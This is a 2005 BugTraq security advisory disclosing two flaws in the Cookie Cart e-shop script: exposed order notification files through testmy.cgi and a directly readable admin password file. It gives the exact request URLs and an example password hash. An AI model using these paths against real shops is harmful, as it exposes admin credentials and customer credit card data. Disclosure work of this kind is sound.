BugTraq
Cookie Cart Default Installation Multiple Vulnerabilities May 21 2005 11:15PM
SoulBlack Group (soulblacktm gmail com)
============================================================

============================================================
Title: Cookie Cart Default Installation Multiple Vulnerabilities
Vendor: http://www.metromkt.net/ccart
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 21/05/2005
Severity: Medium. Remote users can obtain several data of Credits Cards, etc.
Affected version: Unknow
============================================================

============================================================

* Summary *

Cookie Cart Shopping is a Simple E-Shop Commerce.

-------------------------------------------------------------

* Problem Description *

Remote user can obtain Admin password and see Confidential (asi se
escribe ??) Information

-------------------------------------------------------------

* First Vulnerability *

You can see "Order Notification" list with testmy.cgi and testmy.pl

http://www.vulnerable.com/cart/cgi/testmy.cgi?testmycgi=/cart/cgi/testmy
.cgi&path=/cart/dbase_ven/&run=yes

http://www.vulnerable.com/cart/dbase_ven/[vendor_#number-notification.tx
t]

Example:

http://www.vulnerable.com/cart/dbase_ven/vendor_10112088.txt

* Second Vulnerability *

You can read Password File (DES Encryption)

http://www.vulnerable.com/cart/data/passwd.txt

Example:

admin:aeczIj3e6GLso

-------------------------------------------------------------

* Fix *

Use .htaccess or contact Vendor.

-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/cookiec_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus